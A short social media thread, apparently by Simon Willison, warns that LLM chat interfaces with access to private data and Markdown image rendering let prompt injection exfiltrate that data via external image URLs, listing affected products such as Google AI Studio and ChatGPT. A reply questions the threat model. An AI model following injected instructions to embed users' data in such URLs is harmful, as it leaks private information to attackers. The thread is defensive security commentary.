Your regular reminder to never build a LLM-based chat interface with access to privileged information that can render Markdown images targetting external domains, if you don't want a prompt injection attack to be able to instantly exfiltrate that private data
Today's example is Google AI Studio: https://simonwillison.net/2024/Aug/7/google-ai-studio-data-exfiltration-demo/
It joins ChatGPT, Google Bard, writer.com, Amazon Q, Google NotebookLM and GitHub Copilot Chat in my collection of products that have made this mistake: https://simonwillison.net/tags/markdown-exfiltration/
@simon I guess I don't understand how this is an attack. The malicious prompt came from the attacker, but so did everything else. So the attacker already has access to the "exfiltrated" data, right?
Or is there some missing context here?